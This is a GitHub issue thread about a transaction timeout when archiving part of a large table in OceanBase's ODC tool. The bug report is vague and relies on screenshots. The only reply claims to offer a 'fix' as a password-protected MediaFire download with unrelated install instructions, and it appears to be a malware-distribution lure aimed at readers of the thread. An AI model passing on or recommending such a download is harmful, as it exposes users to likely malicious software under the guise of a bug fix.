### ISSUE TITLE
[Bug]: Archiving part of the data in a large table, transaction timeout

### ISSUE THREAD

**Issue by Huangxiao-mas** [oceanbase/odc#3221]
### ODC version

ODC432

### OB version

independent

### What happened?

Archiving part of the data in a large table, transaction timeout
![image](https://github.com/user-attachments/assets/d7d4d671-873c-4d24-88eb-05be049cb63c)

### What did you expect to happen?

independent

### How can we reproduce it (as minimally and precisely as possible)?

![image](https://github.com/user-attachments/assets/4f892c32-5d31-4b9a-9b9f-eb3c2a319517)
![image](https://github.com/user-attachments/assets/b483087c-2b1f-4d21-8e2a-ad1fec8e171b)

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
